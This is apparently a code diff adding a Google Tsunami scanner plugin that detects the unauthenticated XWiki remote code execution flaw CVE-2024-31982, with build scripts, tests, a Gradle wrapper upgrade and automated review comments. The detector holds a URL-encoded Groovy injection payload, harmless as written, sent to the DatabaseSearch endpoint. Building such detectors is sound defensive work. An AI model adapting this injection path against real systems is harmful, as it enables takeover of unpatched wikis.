«set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. 
+# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/platforms/jvm/plugins-application/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. +# +############################################################################## + +# Attempt to set APP_HOME + +# Resolve links: $0 may be a link +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac +done + +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd -P "${APP_HOME:-./}" > /dev/null && printf '%s +' "$PWD" ) || exit + +# Use the maximum available, or set MAX_FD != -1 to use that value. +MAX_FD=maximum + +warn () { + echo "$*" +} >&2 + +die () { + echo + echo "$*" + echo + exit 1 +} >&2 + +# OS specific support (must be 'true' or 'false'). +cygwin=false +msys=false +darwin=false +nonstop=false +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; +esac + +CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar + + +# Determine the Java command to use to start the JVM. 
+if [ -n "$JAVA_HOME" ] ; then + if [ -x "$JAVA_HOME/jre/sh/java" ] ; then + # IBM's JDK on AIX uses strange locations for the executables + JAVACMD=$JAVA_HOME/jre/sh/java + else + JAVACMD=$JAVA_HOME/bin/java + fi + if [ ! -x "$JAVACMD" ] ; then + die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME + +Please set the JAVA_HOME variable in your environment to match the +location of your Java installation." + fi +else + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + +Please set the JAVA_HOME variable in your environment to match the +location of your Java installation." + fi +fi + +# Increase the maximum file descriptors if we can. +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac +fi + +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. 
+ +# For Cygwin or MSYS, switch paths to Windows format before running java +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + + # Now convert the arguments - kludge to limit ourselves to /bin/sh + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) + fi + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg + done +fi + + +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. +# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. 
+# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' + +exec "$JAVACMD" "$@" diff --git a/google/detectors/rce/xwiki/cve202431982/gradlew.bat b/google/detectors/rce/xwiki/cve202431982/gradlew.bat new file mode 100644 index 000000000..9d21a2183 --- /dev/null +++ b/google/detectors/rce/xwiki/cve202431982/gradlew.bat 
@@ -0,0 +1,94 @@ +@rem +@rem Copyright 2015 the original author or authors. +@rem +@rem Licensed under the Apache License, Version 2.0 (the "License"); +@rem you may not use this file except in compliance with the License. +@rem You may obtain a copy of the License at +@rem +@rem https://www.apache.org/licenses/LICENSE-2.0 +@rem +@rem Unless required by applicable law or agreed to in writing, software +@rem distributed under the License is distributed on an "AS IS" BASIS, +@rem WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +@rem See the License for the specific language governing permissions and +@rem limitations under the License. +@rem +@rem SPDX-License-Identifier: Apache-2.0 +@rem + +@if "%DEBUG%"=="" @echo off +@rem ########################################################################## +@rem +@rem Gradle startup script for Windows +@rem +@rem ########################################################################## + +@rem Set local scope for the variables with windows NT shell +if "%OS%"=="Windows_NT" setlocal + +set DIRNAME=%~dp0 +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused +set APP_BASE_NAME=%~n0 +set APP_HOME=%DIRNAME% + +@rem Resolve any "." and ".." in APP_HOME to make it shorter. +for %%i in ("%APP_HOME%") do set APP_HOME=%%~fi + +@rem Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +set DEFAULT_JVM_OPTS="-Xmx64m" "-Xms64m" + +@rem Find java.exe +if defined JAVA_HOME goto findJavaFromJavaHome + +set JAVA_EXE=java.exe +%JAVA_EXE% -version >NUL 2>&1 +if %ERRORLEVEL% equ 0 goto execute + +echo. 1>&2 +echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. 1>&2 +echo. 1>&2 +echo Please set the JAVA_HOME variable in your environment to match the 1>&2 +echo location of your Java installation. 
1>&2 + +goto fail + +:findJavaFromJavaHome +set JAVA_HOME=%JAVA_HOME:"=% +set JAVA_EXE=%JAVA_HOME%/bin/java.exe + +if exist "%JAVA_EXE%" goto execute + +echo. 1>&2 +echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% 1>&2 +echo. 1>&2 +echo Please set the JAVA_HOME variable in your environment to match the 1>&2 +echo location of your Java installation. 1>&2 + +goto fail + +:execute +@rem Setup the command line + +set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar + + +@rem Execute Gradle +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* + +:end +@rem End local scope for the variables with windows NT shell +if %ERRORLEVEL% equ 0 goto mainEnd + +:fail +rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of +rem the _cmd.exe /c_ return code! +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% + +:mainEnd +if "%OS%"=="Windows_NT" endlocal + +:omega diff --git a/google/detectors/rce/xwiki/cve202431982/settings.gradle b/google/detectors/rce/xwiki/cve202431982/settings.gradle new file mode 100644 index 000000000..0979e1228 --- /dev/null +++ b/google/detectors/rce/xwiki/cve202431982/settings.gradle @@ -0,0 +1 @@ +rootProject.name = 'cve202431982' diff --git a/google/detectors/rce/xwiki/cve202431982/src/main/java/com/google/tsunami/plugins/detectors/rce/cve202431982/Cve202431982BootstrapModule.java b/google/detectors/rce/xwiki/cve202431982/src/main/java/com/google/tsunami/plugins/detectors/rce/cve202431982/Cve202431982BootstrapModule.java new file mode 100644 index 000000000..a3d70919f --- /dev/null +++ b/google/detectors/rce/xwiki/cve202431982/src/main/java/com/google/tsunami/plugins/detectors/rce/cve202431982/Cve202431982BootstrapModule.java 
@@ -0,0 +1,27 @@
+/*
+ * Copyright 2024 Google LLC
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+package com.google.tsunami.plugins.detectors.rce.cve202431982;
+
+import com.google.tsunami.plugin.PluginBootstrapModule;
+
+/** A {@link PluginBootstrapModule} for {@link Cve202431982Detector}. */
+public final class Cve202431982BootstrapModule extends PluginBootstrapModule {
+
+ @Override
+ protected void configurePlugin() {
+ registerPlugin(Cve202431982Detector.class);
+ }
+}
diff --git a/google/detectors/rce/xwiki/cve202431982/src/main/java/com/google/tsunami/plugins/detectors/rce/cve202431982/Cve202431982Detector.java b/google/detectors/rce/xwiki/cve202431982/src/main/java/com/google/tsunami/plugins/detectors/rce/cve202431982/Cve202431982Detector.java
new file mode 100644
index 000000000..6962d8268
--- /dev/null
+++ b/google/detectors/rce/xwiki/cve202431982/src/main/java/com/google/tsunami/plugins/detectors/rce/cve202431982/Cve202431982Detector.java
@@ -0,0 +1,138 @@ +/* + * Copyright 2024 Google LLC + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.google.tsunami.plugins.detectors.rce.cve202431982; + +import static com.google.common.base.Preconditions.checkNotNull; +import static com.google.common.collect.ImmutableList.toImmutableList; +import static com.google.tsunami.common.net.http.HttpRequest.get; + +import com.google.common.collect.ImmutableList; +import com.google.common.flogger.GoogleLogger; +import com.google.protobuf.util.Timestamps; +import com.google.tsunami.common.data.NetworkServiceUtils; +import com.google.tsunami.common.net.http.HttpClient; +import com.google.tsunami.common.net.http.HttpResponse; +import com.google.tsunami.common.time.UtcClock; +import com.google.tsunami.plugin.PluginType; +import com.google.tsunami.plugin.VulnDetector; +import com.google.tsunami.plugin.annotations.PluginInfo; +import com.google.tsunami.proto.DetectionReport; +import com.google.tsunami.proto.DetectionReportList; +import com.google.tsunami.proto.DetectionStatus; +import com.google.tsunami.proto.NetworkService; +import com.google.tsunami.proto.Severity; +import com.google.tsunami.proto.TargetInfo; +import com.google.tsunami.proto.Vulnerability; +import com.google.tsunami.proto.VulnerabilityId; +import java.io.IOException; +import java.time.Clock; +import java.time.Instant; +import javax.inject.Inject; + +/** A {@link VulnDetector} that detects a remote code execution vulnerability in 
xwiki. */ +@PluginInfo( + type = PluginType.VULN_DETECTION, + name = "CVE-2024-31982 detector", + version = "0.1", + description = "Detects remote code execution vulnerability in xwiki", + author = "Tsunami Team (tsunami-dev@google.com)", + bootstrapModule = Cve202431982BootstrapModule.class) +public final class Cve202431982Detector implements VulnDetector { + private static final GoogleLogger logger = GoogleLogger.forEnclosingClass(); + private static final ImmutableList POSSIBLE_SUBPATHS = ImmutableList.of("", "xwiki/"); + // Decoded payload: '}}}{{async + // async=false}}{{groovy}}println("tsunami-detection:"+(2001+1024)){{/groovy}}{{/async}}' + // This will print 'tsunami-detection:3025' in the output. + private static final String PAYLOAD = + "%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln%28%22tsunami%2Ddetection%3A%22%2B%282001%2B1024%29%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D"; + private static final String TARGET_PATH = "bin/get/Main/DatabaseSearch?outputSyntax=plain&text="; + + private final Clock utcClock; + private final HttpClient httpClient; + + @Inject + Cve202431982Detector(@UtcClock Clock utcClock, HttpClient httpClient) { + this.utcClock = checkNotNull(utcClock); + this.httpClient = checkNotNull(httpClient).modify().build(); + } + + @Override + public DetectionReportList detect( + TargetInfo targetInfo, ImmutableList matchedServices) { + logger.atInfo().log("Starting detection: CVE-2024-31982 in xwiki"); + DetectionReportList detectionReports = + DetectionReportList.newBuilder() + .addAllDetectionReports( + matchedServices.stream() + .filter(NetworkServiceUtils::isWebService) + .filter(this::isServiceVulnerable) + .map(networkService -> buildDetectionReport(targetInfo, networkService)) + .collect(toImmutableList())) + .build(); + + logger.atInfo().log( + "Detection for CVE-2024-31982 finished, detected '%d' vulns.", + detectionReports.getDetectionReportsCount()); + return detectionReports; + } + + private boolean 
isServiceVulnerable(NetworkService networkService) { + return POSSIBLE_SUBPATHS.stream() + .anyMatch(endpoint -> isEndpointVulnerable(networkService, endpoint)); + } + + private boolean isEndpointVulnerable(NetworkService networkService, String subpath) { + String targetUrl = + NetworkServiceUtils.buildWebApplicationRootUrl(networkService) + + subpath + + TARGET_PATH + + PAYLOAD; + + try { + HttpResponse httpResponse = + httpClient.send(get(targetUrl).withEmptyHeaders().build(), networkService); + return (httpResponse.status().code() == 200 + && httpResponse.bodyString().get().contains("tsunami-detection:3025")); + } catch (IOException e) { + logger.atWarning().withCause(e).log("Failed to send request to %s", targetUrl); + return false; + } + } + + private DetectionReport buildDetectionReport( + TargetInfo scannedTarget, NetworkService vulnerableNetworkService) { + return DetectionReport.newBuilder() + .setTargetInfo(scannedTarget) + .setNetworkService(vulnerableNetworkService) + .setDetectionTimestamp(Timestamps.fromMillis(Instant.now(utcClock).toEpochMilli())) + .setDetectionStatus(DetectionStatus.VULNERABILITY_VERIFIED) + .setVulnerability( + Vulnerability.newBuilder() + .setMainId( + VulnerabilityId.newBuilder().setPublisher("GOOGLE").setValue("CVE-2024-31982")) + .addRelatedId( + VulnerabilityId.newBuilder().setPublisher("CVE").setValue("CVE-2024-31982")) + .setSeverity(Severity.CRITICAL) + .setTitle("xwiki instance vulnerable to CVE-2024-31982") + .setRecommendation( + "Update to one of the patched versions of xwiki: 14.10.20, 15.5.4, 15.10-rc-1") + .setDescription( + "The xwiki instance is vulnerable to CVE-2024-31982. This vulnerability allows" + + " an attacker to take control of the xwiki instance and does not require" + + " authentication.")) + .build(); + } +} 
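Review bot: In `isEndpointVulnerable`, `httpResponse.bodyString().get()` is called without checking that a body is present, and only `IOException` is caught. Assuming `bodyString()` returns an `Optional`, as the `.get()` suggests, a 200 response that the client reports without a body would throw out of the `anyMatch` stream and abort the whole `detect` call instead of counting as "not vulnerable". `return httpResponse.status().code() == 200 && httpResponse.bodyString().map(body -> body.contains("tsunami-detection:3025")).orElse(false);` keeps the probe total. The expected marker is also written twice, once encoded inside `PAYLOAD` and once in the check, so a named constant for the expected output next to the payload comment would keep the two from drifting apart.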
diff --git a/google/detectors/rce/xwiki/cve202431982/src/test/java/com/google/tsunami/plugins/detectors/rce/cve202431982/Cve202431982DetectorTest.java b/google/detectors/rce/xwiki/cve202431982/src/test/java/com/google/tsunami/plugins/detectors/rce/cve202431982/Cve202431982DetectorTest.java new file mode 100644 index 000000000..0144d694a --- /dev/null +++ b/google/detectors/rce/xwiki/cve202431982/src/test/java/com/google/tsunami/plugins/detectors/rce/cve202431982/Cve202431982DetectorTest.java 
@@ -0,0 +1,164 @@ +/* + * Copyright 2024 Google LLC + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.google.tsunami.plugins.detectors.rce.cve202431982; + +import static com.google.common.truth.extensions.proto.ProtoTruth.assertThat; +import static com.google.tsunami.common.data.NetworkEndpointUtils.forHostname; +import static com.google.tsunami.common.data.NetworkEndpointUtils.forHostnameAndPort; + +import com.google.common.collect.ImmutableList; +import com.google.inject.Guice; +import com.google.protobuf.util.Timestamps; +import com.google.tsunami.common.net.http.HttpClientModule; +import com.google.tsunami.common.time.testing.FakeUtcClock; +import com.google.tsunami.common.time.testing.FakeUtcClockModule; +import com.google.tsunami.proto.DetectionReport; +import com.google.tsunami.proto.DetectionStatus; +import com.google.tsunami.proto.NetworkEndpoint; +import com.google.tsunami.proto.NetworkService; +import com.google.tsunami.proto.Severity; +import com.google.tsunami.proto.TargetInfo; +import com.google.tsunami.proto.TransportProtocol; +import com.google.tsunami.proto.Vulnerability; +import com.google.tsunami.proto.VulnerabilityId; +import java.io.IOException; +import java.time.Instant; +import javax.inject.Inject; +import okhttp3.mockwebserver.MockResponse; +import okhttp3.mockwebserver.MockWebServer; +import org.junit.After; +import org.junit.Before; +import org.junit.Test; +import org.junit.runner.RunWith; +import 
org.junit.runners.JUnit4; + +/** Tests for {@link Cve202431982Detector}. */ +@RunWith(JUnit4.class) +public final class Cve202431982DetectorTest { + + private final FakeUtcClock fakeUtcClock = + FakeUtcClock.create().setNow(Instant.parse("2020-01-01T00:00:00.00Z")); + + private static final String VULN_CONTENT = + "RSS feed for search on tsunami-detection:3025"; + + private static final Vulnerability EXPECTED_VULN = + Vulnerability.newBuilder() + .setMainId(VulnerabilityId.newBuilder().setPublisher("GOOGLE").setValue("CVE-2024-31982")) + .addRelatedId(VulnerabilityId.newBuilder().setPublisher("CVE").setValue("CVE-2024-31982")) + .setSeverity(Severity.CRITICAL) + .setTitle("xwiki instance vulnerable to CVE-2024-31982") + .setRecommendation( + "Update to one of the patched versions of xwiki: 14.10.20, 15.5.4, 15.10-rc-1") + .setDescription( + "The xwiki instance is vulnerable to CVE-2024-31982. This vulnerability allows" + + " an attacker to take control of the xwiki instance and does not require" + + " authentication.") + .build(); + + private MockWebServer mockWebServer; + + @Inject private Cve202431982Detector detector; + + @Before + public void setUp() throws IOException { + mockWebServer = new MockWebServer(); + mockWebServer.start(); + Guice.createInjector( + new FakeUtcClockModule(fakeUtcClock), + new HttpClientModule.Builder().build(), + new Cve202431982BootstrapModule()) + .injectMembers(this); + } + + @After + public void tearDown() throws IOException { + mockWebServer.shutdown(); + } + + @Test + public void detect_whenVulnerable_reportsVuln() { + mockWebServer.enqueue(new MockResponse().setResponseCode(200).setBody(VULN_CONTENT)); + ImmutableList httpServices = + ImmutableList.of( + NetworkService.newBuilder() + .setNetworkEndpoint( + forHostnameAndPort(mockWebServer.getHostName(), mockWebServer.getPort())) + .setTransportProtocol(TransportProtocol.TCP) + .setServiceName("http") + .build()); + + var report = + detector + 
.detect(buildTargetInfo(forHostname(mockWebServer.getHostName())), httpServices) + .getDetectionReportsList(); + + assertThat(report) + .containsExactly( + DetectionReport.newBuilder() + .setTargetInfo(buildTargetInfo(forHostname(mockWebServer.getHostName()))) + .setNetworkService(httpServices.get(0)) + .setDetectionTimestamp(Timestamps.fromMillis(fakeUtcClock.millis())) + .setDetectionStatus(DetectionStatus.VULNERABILITY_VERIFIED) + .setVulnerability(EXPECTED_VULN) + .build()); + } + + @Test + public void detect_whenNotVulnerableStatus_reportsNothing() { + mockWebServer.enqueue(new MockResponse().setResponseCode(404).setBody(VULN_CONTENT)); + ImmutableList httpServices = + ImmutableList.of( + NetworkService.newBuilder() + .setNetworkEndpoint( + forHostnameAndPort(mockWebServer.getHostName(), mockWebServer.getPort())) + .setTransportProtocol(TransportProtocol.TCP) + .setServiceName("http") + .build()); + + var report = + detector + .detect(buildTargetInfo(forHostname(mockWebServer.getHostName())), httpServices) + .getDetectionReportsList(); + + assertThat(report).isEmpty(); + } + + @Test + public void detect_whenNotVulnerableContent_reportsNothing() { + mockWebServer.enqueue(new MockResponse().setResponseCode(200).setBody("Irrelevant")); + mockWebServer.enqueue(new MockResponse().setResponseCode(200).setBody("Irrelevant")); + ImmutableList httpServices = + ImmutableList.of( + NetworkService.newBuilder() + .setNetworkEndpoint( + forHostnameAndPort(mockWebServer.getHostName(), mockWebServer.getPort())) + .setTransportProtocol(TransportProtocol.TCP) + .setServiceName("http") + .build()); + + var report = + detector + .detect(buildTargetInfo(forHostname(mockWebServer.getHostName())), httpServices) + .getDetectionReportsList(); + + assertThat(report).isEmpty(); + } + + private static TargetInfo buildTargetInfo(NetworkEndpoint networkEndpoint) { + return TargetInfo.newBuilder().addNetworkEndpoints(networkEndpoint).build(); + } +} 
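Review bot: `detect_whenNotVulnerableStatus_reportsNothing` enqueues a single 404 although the detector probes two subpaths (`""` and `xwiki/`), so the second request has no queued response. The result and duration of that test then depend on how the mock server and the HTTP client behave on an empty queue. Enqueueing a second `new MockResponse().setResponseCode(404).setBody(VULN_CONTENT)`, as `detect_whenNotVulnerableContent_reportsNothing` already does for its case, makes it deterministic. None of the three tests looks at the recorded request, so a change to `TARGET_PATH` or `PAYLOAD` would go unnoticed; asserting on `mockWebServer.takeRequest().getPath()` in the vulnerable case would cover that, and a case where only the `xwiki/` probe answers with the marker is missing.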
diff --git a/google/fingerprinters/web/build.gradle b/google/fingerprinters/web/build.gradle index 61b1c81e2..184d8c43f 100644 --- a/google/fingerprinters/web/build.gradle +++ b/google/fingerprinters/web/build.gradle @@ -122,12 +122,3 @@ task runFingerprintFileConverter(type: JavaExec) { classpath = sourceSets.main.runtimeClasspath mainClass = 'com.google.tsunami.plugins.fingerprinters.web.tools.FingerprintFileConverter' } - -// Force the JRE flavor of Guava for tasks that don't advertise themselves as targeting the JRE. -// https://github.com/google/guava/releases/tag/v32.1.0 -// https://github.com/square/okio/issues/647 -configurations.all { configuration -> - if (name == "compileClasspath" || name == "runtimeClasspath" || name == "compileProtoPath" || name == "testCompileProtoPath" || name == "testCompileClasspath" || name == "testRuntimeClasspath") { - attributes.attribute(Attribute.of("org.gradle.jvm.environment", String), "standard-jvm") - } -} diff --git a/google/fingerprinters/web/gradle/wrapper/gradle-wrapper.jar b/google/fingerprinters/web/gradle/wrapper/gradle-wrapper.jar index 62d4c0535..d64cd4917 100644 Binary files a/google/fingerprinters/web/gradle/wrapper/gradle-wrapper.jar and b/google/fingerprinters/web/gradle/wrapper/gradle-wrapper.jar differ diff --git a/google/fingerprinters/web/gradle/wrapper/gradle-wrapper.properties b/google/fingerprinters/web/gradle/wrapper/gradle-wrapper.properties index 622ab64a3..d04736436 100644 --- a/google/fingerprinters/web/gradle/wrapper/gradle-wrapper.properties +++ b/google/fingerprinters/web/gradle/wrapper/gradle-wrapper.properties @@ -1,5 +1,7 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME zipStorePath=wrapper/dists 
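Review bot: In `gradle-wrapper.properties` the new `distributionUrl` for gradle-7.0 has no `distributionSha256Sum` next to it, so the wrapper accepts whatever archive that URL serves; `validateDistributionUrl=true` checks the URL, not the content. Adding `distributionSha256Sum=<SHA-256 of gradle-7.0-bin.zip as published by Gradle>` pins the download. The same commit replaces `gradle-wrapper.jar` as an opaque binary, which is worth comparing against the published wrapper checksum for that version before merging.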
diff --git a/google/fingerprinters/web/gradlew b/google/fingerprinters/web/gradlew index fbd7c5158..1aa94a426 100755 --- a/google/fingerprinters/web/gradlew +++ b/google/fingerprinters/web/gradlew @@ -1,7 +1,7 @@ -#!/usr/bin/env sh +#!/bin/sh # -# Copyright 2015 the original author or authors. +# Copyright © 2015-2021 the original authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. 
@@ -17,67 +17,99 @@ # ############################################################################## -## -## Gradle start up script for UN*X -## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. 
+# ############################################################################## # Attempt to set APP_HOME + # Resolve links: $0 may be a link -PRG="$0" -# Need this for relative symlinks. -while [ -h "$PRG" ] ; do - ls=`ls -ld "$PRG"` - link=`expr "$ls" : '.*-> \(.*\)$'` - if expr "$link" : '/.*' > /dev/null; then - PRG="$link" - else - PRG=`dirname "$PRG"`"/$link" - fi +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac done -SAVED="`pwd`" -cd "`dirname \"$PRG\"`/" >/dev/null -APP_HOME="`pwd -P`" -cd "$SAVED" >/dev/null -APP_NAME="Gradle" -APP_BASE_NAME=`basename "$0"` - -# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. -DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit # Use the maximum available, or set MAX_FD != -1 to use that value. -MAX_FD="maximum" +MAX_FD=maximum warn () { echo "$*" -} +} >&2 die () { echo echo "$*" echo exit 1 -} +} >&2 # OS specific support (must be 'true' or 'false'). cygwin=false msys=false darwin=false nonstop=false -case "`uname`" in - CYGWIN* ) - cygwin=true - ;; - Darwin* ) - darwin=true - ;; - MINGW* ) - msys=true - ;; - NONSTOP* ) - nonstop=true - ;; +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; esac CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar 
@@ -87,9 +119,9 @@ CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar if [ -n "$JAVA_HOME" ] ; then if [ -x "$JAVA_HOME/jre/sh/java" ] ; then # IBM's JDK on AIX uses strange locations for the executables - JAVACMD="$JAVA_HOME/jre/sh/java" + JAVACMD=$JAVA_HOME/jre/sh/java else - JAVACMD="$JAVA_HOME/bin/java" + JAVACMD=$JAVA_HOME/bin/java fi if [ ! -x "$JAVACMD" ] ; then die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME 
